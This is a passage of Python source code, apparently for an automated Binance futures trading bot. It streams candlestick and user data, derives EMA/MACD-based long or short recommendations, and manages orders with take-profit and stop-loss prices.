recommendation_logs.write("This recommendation log was created at UTC: {}({}).\n".format(current_time, current_datetime))
recommendation_logs.close()
order_logs = open(self.__order_log_path,"w+")
order_logs.write("This order log was created at UTC: {}({}).\n".format(current_time, current_datetime))
order_logs.close()
error_logs = open(self.__error_log_path, "w+")
error_logs.write("This error log was created at UTC: {}({}).\n".format(current_time, current_datetime))
error_logs.close()
error_logs = open(self.__position_log_path, "w+")
error_logs.write("This position log was created at UTC: {}({}).\n".format(current_time, current_datetime))
error_logs.close()
error_logs = open(self.__profit_log_path, "w+")
error_logs.write("This profit log was created at UTC: {}({}).\n".format(current_time, current_datetime))
error_logs.close()
except Exception as e:
print("An error occurs while making log directory: ", e)
return False
else:
return True
def update_parired_asset_info(self):
"""
https://binance-docs.github.io/apidocs/futures/cn/#0f3f2d5ee7
https://www.w3schools.com/python/ref_func_hasattr.asp
"""
for item in self.exchange_info.symbols:
# PrintMix.print_data(item)
if ((hasattr(item, 'contractType')) and (hasattr(item, 'symbol')) and (hasattr(item, 'pair'))):
if ((item.pair == self.__paried_symbol) and (item.symbol == self.__paried_symbol) and (item.contractType == "PERPETUAL")):
# PrintMix.print_data(item)
self.paired_asset_info = item
self.__pricePrecision = item.pricePrecision
self.__quantityPrecision = item.quantityPrecision
self.__baseAssetPrecision = item.baseAssetPrecision
self.__quotePrecision = item.quotePrecision
break
        if self.paired_asset_info is None:
            raise Exception('\nInvalid symbol: {}\n'.format(self.__paried_symbol))
print('\n========== Succeed updating paired asset info ==========\n')
def update_exchange_info(self):
'''
https://binance-docs.github.io/apidocs/futures/cn/#0f3f2d5ee7
'''
result = self.request_client.get_exchange_information()
self.exchange_info = result
if self.exchange_info == None:
raise Exception('\nFailed updating exchange info\n')
        print('========== Succeed updating exchange info ==========')
def update_client(self):
client = Client(self.__api_key, self.__api_secret)
self.client = client
if self.client == None:
raise Exception('\nFailed updating client\n')
print('========== Succeed updating client ==========')
def update_listen_key(self):
'''
https://binance-docs.github.io/apidocs/futures/cn/#listenkey-user_stream-
'''
request_client = RequestClient(api_key=self.__api_key, secret_key=self.__api_secret)
listen_key = request_client.start_user_data_stream()
self.request_client = request_client
self.listen_key = listen_key
self.update_sub_client()
print('========== Succeed updating listen key ==========')
def extend_listen_key(self):
'''
Keep user data stream
https://binance-docs.github.io/apidocs/futures/cn/#listenkey-user_stream2
'''
result = self.request_client.keep_user_data_stream()
print("Trying to reconnect...\nResult: ", result)
def update_account_info(self):
'''
https://binance-docs.github.io/apidocs/futures/cn/#v2-user_data-2
'''
result = self.request_client.get_account_information_v2()
self.account_info = result
if self.account_info == None:
raise Exception('\nFailed updating account info\n')
print('========== Succeed updating account info ==========')
def update_sub_client(self):
        sub_client = SubscriptionClient(api_key=self.__api_key, secret_key=self.__api_secret)
self.sub_client = sub_client
if self.sub_client == None:
raise Exception('\nFailed updating subscription client\n')
print('========== Succeed updating subscription client ==========')
def subscribe_book_depth_event(self):
'''
https://github.com/Binance-docs/Binance_Futures_python/blob/master/example/websocket/subscribebookdepth.py
https://binance-docs.github.io/apidocs/futures/cn/#6ae7c2b506
'''
logger = logging.getLogger("binance-futures")
logger.setLevel(level=logging.INFO)
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))
logger.addHandler(handler)
def callback(data_type: 'SubscribeMessageType', event: 'any'):
'''
https://github.com/Binance-docs/Binance_Futures_python/blob/master/binance_f/model/orderbookevent.py
'''
if data_type == SubscribeMessageType.RESPONSE:
pass
# print("Event ID: ", event)
elif data_type == SubscribeMessageType.PAYLOAD:
self.depth_object = event
self.__latest_depth_update_timestamp = event.transactionTime
# print("Event type: ", event.eventType)
# print("Event time: ", event.eventTime)
# print("transaction time: ", event.transactionTime)
# print("Symbol: ", event.symbol)
# print("first update Id from last stream: ", event.firstUpdateId)
# print("last update Id from last stream: ", event.lastUpdateId)
# print("last update Id in last stream: ", event.lastUpdateIdInlastStream)
# print("=== Bids ===")
# PrintMix.print_data(event.bids)
# print("===================")
# print("=== Asks ===")
# PrintMix.print_data(event.asks)
# print("===================")
else:
print("Unknown Data:")
# print()
def error(e: 'BinanceApiException'):
print(e.error_code + e.error_message)
log = "\n\n{}\nBook depth subscription error: {} at {}\n{}\n\n".format(self.margin,
e.error_code + e.error_message,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
# Valid limit values are 5, 10, or 20
self.sub_client.subscribe_book_depth_event(self.__paried_symbol.lower(), 20, callback, error, update_time=UpdateTime.FAST)
#sub_client.subscribe_book_depth_event("btcusdt", 10, callback, error, update_time=UpdateTime.NORMAL)
#sub_client.subscribe_book_depth_event("btcusdt", 10, callback, error)
def subscribe_user_data_event(self):
'''
https://binance-docs.github.io/apidocs/futures/cn/#balance-position
https://binance-docs.github.io/apidocs/futures/cn/#060a012f0b
https://github.com/Binance-docs/Binance_Futures_python/blob/master/binance_f/model/accountupdate.py
'''
logger = logging.getLogger("binance-client")
logger.setLevel(level=logging.INFO)
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))
logger.addHandler(handler)
sub_client = self.sub_client
def callback(data_type: 'SubscribeMessageType', event: 'any'):
if data_type == SubscribeMessageType.RESPONSE:
print("Event ID: ", event)
elif data_type == SubscribeMessageType.PAYLOAD:
if (event.eventType == "ACCOUNT_UPDATE"):
for item in event.positions:
if (item.symbol == self.__paried_symbol):
self.account_update_list.append(event)
put_to_log('\n\nPosition updated: {}\n{}\n'.format(current_date_time(), convert_object_to_string(item)), self.__position_log_path)
self.position_status.position_last_update_time = event.transactionTime
# print('\n\n\n------------------')
# print('Position amount')
# print("Event Type: ", event.eventType)
# print("Event time: ", event.eventTime)
# print("Current time: ", current_date_time())
# print("Transaction time: ", event.transactionTime)
# print('------------------')
# print(PrintMix.print_data(self.position_status))
self.position_status.position_object = item
# print('---------- CHANGED TO ----------')
# PrintMix.print_data(self.position_status)
# print('------------------\n')
# print("=== Balances ===")
# PrintMix.print_data(event.balances)
# print("================")
# print("=== Positions ===")
# PrintMix.print_data(event.positions)
# print("================")
elif(event.eventType == "ORDER_TRADE_UPDATE"):
'''
https://github.com/Binance-docs/Binance_Futures_python/blob/master/binance_f/model/orderupdate.py
NEW
PARTIAL_FILL (partially filled)
FILL (filled)
CANCELED (canceled)
CALCULATED
EXPIRED (order expired)
TRADE (trade)
'''
if event.symbol == self.__paried_symbol:
self.order_update_list.append(event)
# print('------------------')
# print("Event Type: ", event.eventType)
# print("Event time: ", event.eventTime)
# print("Current time: ", current_date_time())
# print("Transaction Time: ", event.transactionTime)
# print('------------------')
# print(PrintMix.print_data(self.position_status))
self.position_status.order_status = event.orderStatus
self.position_status.order_cumulativeFilledQty = event.cumulativeFilledQty
self.position_status.order_amount = event.avgPrice
self.position_status.order_side = event.side
self.position_status.order_last_update_time = event.eventTime
# print('---------- CHANGED TO ----------')
# PrintMix.print_data(self.position_status)
# print('------------------\n\n\n')
# print("Symbol: ", event.symbol)
# print("Client Order Id: ", event.clientOrderId)
# print("Side: ", event.side)
# print("Order Type: ", event.type)
# print("Time in Force: ", event.timeInForce)
# print("Original Quantity: ", event.origQty)
# print("Position Side: ", event.positionSide)
# print("Price: ", event.price)
# print("Average Price: ", event.avgPrice)
# print("Stop Price: ", event.stopPrice)
# print("Execution Type: ", event.executionType)
# print("Order Status: ", event.orderStatus)
# print("Order Id: ", event.orderId)
# print("Order Last Filled Quantity: ", event.lastFilledQty)
# print("Order Filled Accumulated Quantity: ", event.cumulativeFilledQty)
# print("Last Filled Price: ", event.lastFilledPrice)
# print("Commission Asset: ", event.commissionAsset)
# print("Commissions: ", event.commissionAmount)
# print("Order Trade Time: ", event.orderTradeTime)
# print("Trade Id: ", event.tradeID)
# print("Bids Notional: ", event.bidsNotional)
# print("Ask Notional: ", event.asksNotional)
# print("Is this trade the maker side?: ", event.isMarkerSide)
# print("Is this reduce only: ", event.isReduceOnly)
# print("stop price working type: ", event.workingType)
# print("Is this Close-All: ", event.isClosePosition)
# if not event.activationPrice is None:
# print("Activation Price for Trailing Stop: ", event.activationPrice)
# if not event.callbackRate is None:
# print("Callback Rate for Trailing Stop: ", event.callbackRate)
elif(event.eventType == "listenKeyExpired"):
print("\nEvent: ", event.eventType)
print("Event time: ", event.eventTime)
print("CAUTION: YOUR LISTEN-KEY HAS EXPIRED!!!")
print("CAUTION: YOUR LISTEN-KEY HAS EXPIRED!!!")
print("CAUTION: YOUR LISTEN-KEY HAS EXPIRED!!!")
self.extend_listen_key()
else:
print("Unknown Data:")
# print()
def error(e: 'BinanceApiException'):
# print(e.error_code + e.error_message)
log = "\n\n{}\nUser data subscription error: {} at {}\n{}\n\n".format(self.margin,
e.error_code + e.error_message,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
sub_client.subscribe_user_data_event(self.listen_key, callback, error)
def subscribe_candlestick_event(self):
'''
https://binance-docs.github.io/apidocs/futures/cn/#k-4
or
https://binance-docs.github.io/apidocs/futures/cn/#k-5
https://github.com/Binance-docs/Binance_Futures_python/blob/master/binance_f/model/candlestickevent.py
'''
logger = logging.getLogger("binance-futures")
logger.setLevel(level=logging.INFO)
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))
logger.addHandler(handler)
sub_client = self.sub_client
def callback(data_type: 'SubscribeMessageType', event: 'any'):
if data_type == SubscribeMessageType.RESPONSE:
pass
# print("Event ID: ", event)
elif data_type == SubscribeMessageType.PAYLOAD:
self.update_historical_kline(event)
# print("Event type: ", event.eventType)
# print("Event time: ", event.eventTime)
# print("Symbol: ", event.symbol)
# print("Data:")
# PrintBasic.print_obj(event.data)
else:
print("Unknown Data:")
# print()
def error(e: 'BinanceApiException'):
# print(e.error_code + e.error_message)
log = "\n\n{}\nCandlestick subscription error: {} at {}\n{}\n\n".format(self.margin,
e.error_code + e.error_message,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
sub_client.subscribe_candlestick_event(self.__paried_symbol.lower(), self.__interval, callback, error)
def update_historical_kline(self, event):
'''
https://binance-docs.github.io/apidocs/futures/cn/#k-4
https://github.com/Binance-docs/Binance_Futures_python/blob/master/binance_f/model/candlestickevent.py
event:
Event type: kline
Event time: 1609506873291
Symbol: BLZUSDT
Data:
close:0.06756
closeTime:1609506899999
firstTradeId:3634790
high:0.06758
ignore:0
interval:1m
isClosed:False
json_parse:<function Candlestick.json_parse at 0x107909d30>
lastTradeId:3634796
low:0.06751
numTrades:7
open:0.06758
quoteAssetVolume:746.46888
startTime:1609506840000
symbol:BLZUSDT
takerBuyBaseAssetVolume:0.0
takerBuyQuoteAssetVolume:0.0
volume:11054.0
'''
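# Update strategy (a short summary of the code below): when the incoming candle is
# closed, the full history is re-fetched via get_historical_kline(); when the event
# belongs to the candle currently being built (startTime within 60s of the stored
# update time), only the last element of each list in kline_info['kline_list'] is
# overwritten in place; otherwise the cached history is treated as stale and re-fetched.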
try:
startTime = event.data.startTime
isClosed = event.data.isClosed
if isClosed:
self.get_historical_kline()
elif startTime - self.kline_info['updated_time'] < 60000:
kline_info = self.kline_info.copy()
kline_object = event.data
kline_info['kline_list']['open_price_list'][-1] = float(kline_object.open) # o
kline_info['kline_list']['high_price_list'][-1] = float(kline_object.high) # h
kline_info['kline_list']['low_price_list'][-1] = float(kline_object.low) # l
kline_info['kline_list']['close_price_list'][-1] = float(kline_object.close) # c
kline_info['kline_list']['quoteAssetVolume_list'][-1] = float(kline_object.quoteAssetVolume) # vol(quoAsset)
kline_info['kline_list']['volume_list'][-1] = float(kline_object.volume) # vol
kline_info['kline_list']['takerBuyBaseAssetVolume_list'][-1] = float(kline_object.takerBuyBaseAssetVolume) # takerBuyBaseAssetVolume
kline_info['kline_list']['takerBuyQuoteAssetVolume_list'][-1] = float(kline_object.takerBuyQuoteAssetVolume) # takerBuyQuoteAssetVolume
kline_info['kline_list']['numTrades_list'][-1] = int(kline_object.numTrades) # numTrades
kline_info['updated_time'] = startTime
self.kline_info = kline_info
else:
self.get_historical_kline()
self.__latest_data_update_timestamp = event.eventTime
# print(self.kline_info['kline_list']['close_price_list'][-10:])
except Exception as e:
log = "\n\n{}\nAn ERROR happened while updating historical data: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
def get_historical_kline(self):
'''
klines:
close:347.15
closeTime:1609496279999
high:347.75
ignore:0
json_parse:<function Candlestick.json_parse at 0x10c8b41f0>
low:347.06
numTrades:298
open:347.30
openTime:1609496220000
quoteAssetVolume:65901.36106
takerBuyBaseAssetVolume:111.498
takerBuyQuoteAssetVolume:38745.65489
volume:189.645
[
[
1499040000000, // open time
"0.01634790", // open price (o)
"0.80000000", // high price (h)
"0.01575800", // low price (l)
"0.01577100", // close price (latest price while the current candle is still open) (c)
"148976.11427815", // base asset volume
1499644799999, // close time
"2434.19055334", // quote asset volume
308, // number of trades
"1756.87402397", // taker buy base asset volume
"28.46694368", // taker buy quote asset volume
"17928899.62484339" // ignore this field
]
]
'''
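# The raw candlesticks returned by get_candlestick_data() are unpacked below into
# parallel per-field lists (open/high/low/close, volumes, numTrades) so that the
# indicator helpers consuming kline_info['kline_list'] can work on plain numeric
# sequences.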
try:
klines = self.request_client.get_candlestick_data(symbol=self.__paried_symbol, interval=self.__interval,limit=self.__initial_data_num)
# PrintBasic.print_obj(klines[-1])
last_n = klines[((-1) * self.__initial_data_num):]
kline_info = self.kline_info.copy()
kline_info['kline_list'] = {
'open_price_list': [],
'high_price_list': [],
'low_price_list': [],
'close_price_list': [],
'quoteAssetVolume_list': [],
'volume_list': [],
'takerBuyBaseAssetVolume_list': [],
'takerBuyQuoteAssetVolume_list': [],
'numTrades_list': []
}
kline_info['updated_time'] = last_n[-1].openTime
for item in last_n:
kline_info['kline_list']['open_price_list'].append(float(item.open)) # o
kline_info['kline_list']['high_price_list'].append(float(item.high)) # h
kline_info['kline_list']['low_price_list'].append(float(item.low)) # l
kline_info['kline_list']['close_price_list'].append(float(item.close)) # c
kline_info['kline_list']['quoteAssetVolume_list'].append(float(item.quoteAssetVolume)) # vol(quoAsset)
kline_info['kline_list']['volume_list'].append(float(item.volume)) # vol
kline_info['kline_list']['takerBuyBaseAssetVolume_list'].append(float(item.takerBuyBaseAssetVolume)) # takerBuyBaseAssetVolume
kline_info['kline_list']['takerBuyQuoteAssetVolume_list'].append(float(item.takerBuyQuoteAssetVolume)) # takerBuyQuoteAssetVolume
kline_info['kline_list']['numTrades_list'].append(int(item.numTrades)) # numTrades
self.kline_info = kline_info
print('========== Succeeded getting historical data ==========')
# print(self.kline_info['kline_list']['close_price_list'])
except Exception as e:
log = "\n\n{}\nAn ERROR happened while getting historical data: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
def start_subscribing(self):
try:
t1 = threading.Thread(target=self.subscribe_candlestick_event)
t2 = threading.Thread(target=self.subscribe_user_data_event)
# t3 = threading.Thread(target=self.subscribe_book_depth_event)
# subs_task_list = [t1, t2, t3]
subs_task_list = [t1, t2]
for task in subs_task_list:
task.start()
for task in subs_task_list:
task.join()
except Exception as e:
log = "\n\n{}\nAn ERROR happened while starting subscription: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
def start_handler(self):
time.sleep(3)
try:
t1 = threading.Thread(target=self.order_handler)
t2 = threading.Thread(target=self.position_handler)
# t3 = threading.Thread(target=self.position_status_handler)
handler_task_list = [t1, t2]
for task in handler_task_list:
task.start()
for task in handler_task_list:
task.join()
except Exception as e:
log = "\n\n{}\nAn ERROR happened while starting the handler: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
def get_recommendation(self, MACD_dict, EMA_dict, RSI_dict):
level = 0
side = None
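# Signal levels produced below (a summary of the rules as written):
#   level 3 - the medium EMA (ema2) crosses the slow EMA (ema3) between the previous
#             and the latest candle; the direction of the cross gives long/short.
#   level 2 - the fast EMA (ema1) crosses the slow EMA (ema3) and the MACD line is
#             on the matching side of its signal line.
#   level 1 - the fast EMA (ema1) crosses the medium EMA (ema2) with the same MACD
#             confirmation.
# level 0 with side None means no recommendation.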
try:
# Long
if ( ( EMA_dict['ema2'][-1] > EMA_dict['ema3'][-1] ) and ( EMA_dict['ema2'][-2] < EMA_dict['ema3'][-2] ) ):
side = 'long'
level = 3
return level, side
# Short
elif ( ( EMA_dict['ema2'][-1] < EMA_dict['ema3'][-1] ) and ( EMA_dict['ema2'][-2] > EMA_dict['ema3'][-2] ) ):
side = 'short'
level = 3
return level, side
# # Long
# elif ( ( RSI_dict['rsi1'][-1] > 30 ) and ( RSI_dict['rsi1'][-2] < 30 ) and ( RSI_dict['rsi2'][-1] > 30 ) and ( RSI_dict['rsi2'][-2] < 30 ) and ( RSI_dict['rsi3'][-1] > 30 ) and ( RSI_dict['rsi3'][-2] < 30 ) ):
# side = 'long'
# level = 2
# return level, side
# Short
# elif ( ( RSI_dict['rsi1'][-1] < 70 ) and ( RSI_dict['rsi1'][-2] > 70 ) and ( RSI_dict['rsi2'][-1] < 70 ) and ( RSI_dict['rsi2'][-2] > 70 ) and ( RSI_dict['rsi3'][-1] < 70 ) and ( RSI_dict['rsi3'][-2] > 70 ) ):
# side = 'short'
# level = 2
# return level, side
# Long
elif ( ( ( EMA_dict['ema1'][-1] > EMA_dict['ema3'][-1] ) and ( EMA_dict['ema1'][-2] < EMA_dict['ema3'][-2] ) ) and ( ( ( MACD_dict['macd'][-1] - MACD_dict['macdsignal'][-1] ) >= 0 ) ) ):
side = 'long'
level = 2
return level, side
# Short
elif ( ( ( EMA_dict['ema1'][-1] < EMA_dict['ema3'][-1] ) and ( EMA_dict['ema1'][-2] > EMA_dict['ema3'][-2] ) ) and ( ( ( MACD_dict['macd'][-1] - MACD_dict['macdsignal'][-1] ) <= 0 ) ) ):
side = 'short'
level = 2
return level, side
# Long
elif ( ( ( EMA_dict['ema1'][-1] > EMA_dict['ema2'][-1] ) and ( EMA_dict['ema1'][-2] < EMA_dict['ema2'][-2] ) ) and ( ( ( MACD_dict['macd'][-1] - MACD_dict['macdsignal'][-1] ) >= 0 ) ) ):
side = 'long'
level = 1
return level, side
# Short
elif ( ( ( EMA_dict['ema1'][-1] < EMA_dict['ema2'][-1] ) and ( EMA_dict['ema1'][-2] > EMA_dict['ema2'][-2] ) ) and ( ( ( MACD_dict['macd'][-1] - MACD_dict['macdsignal'][-1] ) <= 0 ) ) ):
side = 'short'
level = 1
return level, side
except Exception as e:
log = "\n\n{}\nAn ERROR happened while getting recommendations: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
return level, side
else:
# return 1, 'short'
return level, side
def start_analysing(self):
while True:
try:
# print((self.current_recommendation['short']['updated_time']))
if ((current_utc_time() - (self.current_recommendation['short']['updated_time'])) > 0.5):
self.current_recommendation['short'] = {
'updated_time': 0,
'level': 0,
'price': None
}
if ((current_utc_time() - (self.current_recommendation['long']['updated_time'])) > 0.5):
self.current_recommendation['long'] = {
'updated_time': 0,
'level': 0,
'price': None
}
kline_info = self.kline_info
if len(kline_info['kline_list']['close_price_list']) == self.__initial_data_num:
self.__latest_data_analysis_timestamp = self.__latest_data_update_timestamp
MACD, EMA, RSI, EMV = get_indicators(kline_info['kline_list'], self.indicator_config)
if ((MACD != None) and (EMA != None) and (RSI != None)):
MACD_dict = {
'macd': np.round(MACD[0], decimals=4),
'macdsignal': np.round(MACD[1], decimals=4),
'macdhist': np.round(MACD[2], decimals=4)
}
EMA_dict = {
'ema1': np.round(EMA[0], decimals=3),
'ema2': np.round(EMA[1], decimals=3),
'ema3': np.round(EMA[2], decimals=3)
}
RSI_dict = {
'rsi1': np.round(RSI[0], decimals=3),
'rsi2': np.round(RSI[1], decimals=3),
'rsi3': np.round(RSI[2], decimals=3)
}
self.indicator_dict = {
'MACD_dict': MACD_dict,
'EMA_dict': EMA_dict,
'RSI_dict': RSI_dict,
'EMV_list': EMV
}
latest_price = kline_info['kline_list']['close_price_list'][-1]
level, side = self.get_recommendation(MACD_dict, EMA_dict, RSI_dict)
'''
self.current_recommendation = {
'short': {
'updated_time': 0,
'level': 0,
'price': None
},
'long': {
'updated_time': None,
'level': 0,
'price': None
}
}
'''
if level >= 0:
if (side == 'long' or side == 'short'):
self.current_recommendation[side]['level'] = level
self.current_recommendation[side]['price'] = latest_price
self.current_recommendation[side]['updated_time'] = current_utc_time()
temp_logs = '\n\n{}\nNew {} recommendation:\nLevel: {}\nPrice: {}\nDatetime: {}\nTimestamp: {}\n{}\n\n'.format(
self.margin,
side.upper(),
level,
latest_price,
utc_2_datetime(self.current_recommendation[side]['updated_time']),
self.current_recommendation[side]['updated_time'],
self.margin
)
# print(temp_logs)
put_to_log(temp_logs, self.__recommendation_log_path)
# print ("\r||(MACD - MACDSignal) = {:.3f}||RSI({}): {:.3f}||RSI({}): {:.3f}||RSI({}): {:.3f}||EMA{}: {:.3f}||EMA{}: {:.3f}|| EMA{}: {:.3f}||Buy level: {}||Sell level: {}||Price: {:.2f}||Time: {}||".format
# (macd[-1] - macdsignal[-1],
# self.indicator_config['rsi']['rsi1'],
# rsi1[-1],
# self.indicator_config['rsi']['rsi2'],
# rsi2[-1],
# self.indicator_config['rsi']['rsi3'],
# rsi3[-1],
# self.indicator_config['ema']['ema1'],
# ema1[-1],
# self.indicator_config['ema']['ema2'],
# ema2[-1],
# self.indicator_config['ema']['ema3'],
# ema3[-1],
# buy_level,
# sell_level,
# float(np_price_list[-1]),
# current_date_time()
# ), end="")
except Exception as e:
log = "\n\n{}\nAn ERROR happened while analyzing market data: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
def check_if_service_avaliable(self):
'''
https://stackoverflow.com/questions/16755394/what-is-the-easiest-way-to-get-current-gmt-time-in-unix-timestamp-format
'''
time.sleep(3)
while True:
if len(self.current_position_dict) > 0:
string = "\r|" + current_date_time()
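# The ROE printed below is an estimate: 100 * leverage * (last close / entry price - 1),
# with the sign flipped for shorts. Illustrative arithmetic with hypothetical numbers:
# leverage 10, entry 350.00, last close 353.50 for a long gives
# 100 * 10 * (353.50 / 350.00 - 1) = 10.0%.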
for clientID in self.current_position_dict.keys():
string += "|PositionSide: {} |Amount: {} |EntryPrice: {} |CurrentPrice: {} |ROE: {:.3f}%|".format(
self.current_position_dict[clientID]['positionSide'],
self.current_position_dict[clientID]['quantity'] if self.current_position_dict[clientID]['quantity']!= None else "NA",
self.current_position_dict[clientID]['entryPrice'] if self.current_position_dict[clientID]['entryPrice'] else "NA",
self.kline_info['kline_list']['close_price_list'][-1] if self.kline_info['kline_list']['close_price_list'][-1] != None else "NA",
(100*self.__leverage*(self.kline_info['kline_list']['close_price_list'][-1]/self.current_position_dict[clientID]['entryPrice']-1) * (-1 if self.current_position_dict[clientID]['positionSide'].lower() == 'short' else 1)) if ( self.current_position_dict[clientID]['entryPrice'] != None) else 0.00
)
print(string, end = "")
else:
kline_string = '|o:{:.2f}|h:{:.2f}|l:{:.2f}|c:{:.2f}|QuoVol:{:.2f}|BaseVol:{:.2f}|BuyBaseVol:{:.2f}|BuyQuoVol:{:.2f}|numTrades:{}|'.format(
self.kline_info['kline_list']['open_price_list'][-1],
self.kline_info['kline_list']['high_price_list'][-1],
self.kline_info['kline_list']['low_price_list'][-1],
self.kline_info['kline_list']['close_price_list'][-1],
self.kline_info['kline_list']['quoteAssetVolume_list'][-1],
self.kline_info['kline_list']['volume_list'][-1],
self.kline_info['kline_list']['takerBuyBaseAssetVolume_list'][-1],
self.kline_info['kline_list']['takerBuyQuoteAssetVolume_list'][-1],
self.kline_info['kline_list']['numTrades_list'][-1]
)
recommendation_string = '|_R_|LONG:L: {},P:{}|SHORT:L: {},P:{}|'.format(
self.current_recommendation['long']['level'],
self.current_recommendation['long']['price'],
self.current_recommendation['short']['level'],
self.current_recommendation['short']['price']
)
indicator_dict = self.indicator_dict
if len(indicator_dict) > 0:
# print(indicator_dict['EMV_list'][-1])
indicator_string = '|EMA:{:.2f}--{:.2f}--{:.2f}|MACDdiff:{:.2f}|EMV:{:.2f}|'.format(
indicator_dict['EMA_dict']['ema1'][-1],
indicator_dict['EMA_dict']['ema2'][-1],
indicator_dict['EMA_dict']['ema3'][-1],
indicator_dict['MACD_dict']['macd'][-1] - indicator_dict['MACD_dict']['macdsignal'][-1],
indicator_dict['EMV_list'][-1]
)
else:
indicator_string = ""
print('\r' + kline_string + recommendation_string + indicator_string, end="")
try:
# time.sleep(1)
# if self.depth_object!= None:
# bids_string = '{}'.format([order.price for order in self.depth_object.bids[-10:]])
# asks_string = '{}'.format([order.price for order in self.depth_object.asks[-10:]])
# margin = '========================================================================='
# print('\n\n\n{}\nRecent Market Prices:\n{}\n\nTop bids:\n{}\n\nTop asks:\n{}\n{}\n\n\n'.format(margin, price_string, bids_string, asks_string, margin))
current_time = current_utc_time()*1000
server_status = self.client.get_system_status()
current_candlestick_data_time = int(self.__latest_data_update_timestamp)
current_depth_data_time = int(self.__latest_depth_update_timestamp)
candlestick_data_time_diff_in_seconds = (current_time - current_candlestick_data_time)/1000
depth_data_time_diff_in_seconds = (current_time - current_depth_data_time)/1000
if server_status['status'] == 1:
print('> > > > > > > > > > > > > > System maintenance. < < < < < < < < < < < < < < < <')
if ((candlestick_data_time_diff_in_seconds > 1) and (current_time != (candlestick_data_time_diff_in_seconds*1000))):
print("Candlestick data fetching was down for: {:.3f}s".format(candlestick_data_time_diff_in_seconds))
if ((depth_data_time_diff_in_seconds > 1) and (current_time!=(depth_data_time_diff_in_seconds*1000))):
print("Depth data fetching was down for: {:.3f}s".format(depth_data_time_diff_in_seconds))
except Exception as e:
log = "\n\n{}\nAn ERROR happened while monitoring services: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
def position_handler(self):
'''
https://github.com/Binance-docs/Binance_Futures_python/blob/master/binance_f/model/orderupdate.py
has_key was removed in Python 3:
https://stackoverflow.com/questions/33727149/dict-object-has-no-attribute-has-key?answertab=votes#tab-top
https://docs.python.org/3.0/whatsnew/3.0.html#builtins
https://github.com/Binance-docs/Binance_Futures_python/blob/master/binance_f/model/orderupdate.py
self.current_position_dict = {
'uniqueOrderId': {
'uniqueOrderId': None
'level': 1, 2, or 3
'positionSide': 'SIDE',
'trigeredPrice': -99999
'entryPrice': -99999,
'exitPrice': -99999,
'quantity': 0,
'comission': 999,
'relatedOrderID': {}
}
Order status (status):
NEW
PARTIALLY_FILLED
FILLED
CANCELED
REJECTED
EXPIRED
'''
while True:
try:
if len(self.order_update_list) > 0:
first_order = self.order_update_list.pop(0)
clientOrderId = first_order.clientOrderId
if len(clientOrderId) >= 13:
prefix_id = clientOrderId[:13]
else:
prefix_id = clientOrderId
if prefix_id in self.current_position_dict:
print("\n====================================================================\nReceived a bot order:")
PrintMix.print_data(first_order)
put_to_log('\n\nBot order: {}\n{}\n'.format(current_date_time(), convert_object_to_string(first_order)), self.__order_log_path)
print("====================================================================")
positionSide = first_order.positionSide.lower()
orderPosition = first_order.side.lower()
orderStatus = first_order.orderStatus.lower()
if ((positionSide == 'long' and orderPosition == 'buy') or (positionSide == 'short' and orderPosition == 'sell')):
if (orderStatus == 'PARTIALLY_FILLED'.lower() or orderStatus == 'FILLED'.lower()):
if orderStatus == 'PARTIALLY_FILLED'.lower():
try:
self.client.futures_cancel_order(origClientOrderId = clientOrderId, symbol = self.__paried_symbol)
except Exception as e:
log = "\n\n{}\nAn ERROR happened while cancelling the unfilled order: {}, ERROR({}) at {}\n{}\n\n".format(self.margin,
clientOrderId,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
self.current_position_dict[prefix_id]['entryPrice'] = first_order.avgPrice
self.current_position_dict[prefix_id]['quantity'] = first_order.cumulativeFilledQty
self.current_position_dict[prefix_id]['relatedOrderID'][clientOrderId] = first_order
self.current_position_dict[prefix_id]['comission'] += (0 if first_order.commissionAmount == None else first_order.commissionAmount)
# self.__starting_asset_value -= ((first_order.avgPrice * first_order.cumulativeFilledQty)/self.__leverage)
#TODO: sell order:
correspondingTargetProfitRatio = self.target_profit_dict['level' + str(self.current_position_dict[prefix_id]['level'])]
if positionSide.lower() == 'long':
TP_stopPrice = round( ( first_order.avgPrice * (1+ (correspondingTargetProfitRatio + self.__comission_rate)/self.__leverage) ) ,2)
SM_stopPrice = round( ( first_order.avgPrice * (1-(self.__stop_loss_ratio)/self.__leverage) ),2)
elif positionSide.lower() == 'short':
TP_stopPrice = round( ( first_order.avgPrice * (1 - (correspondingTargetProfitRatio + self.__comission_rate)/self.__leverage) ) ,2)
SM_stopPrice = round( ( first_order.avgPrice * (1 + (self.__stop_loss_ratio)/self.__leverage) ),2)
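# Illustrative arithmetic with hypothetical numbers (entry avgPrice 350.00, leverage 10,
# target profit ratio 0.05, commission rate 0.0008, stop-loss ratio 0.05) for a long:
#   TP_stopPrice = 350.00 * (1 + (0.05 + 0.0008) / 10) = 351.78
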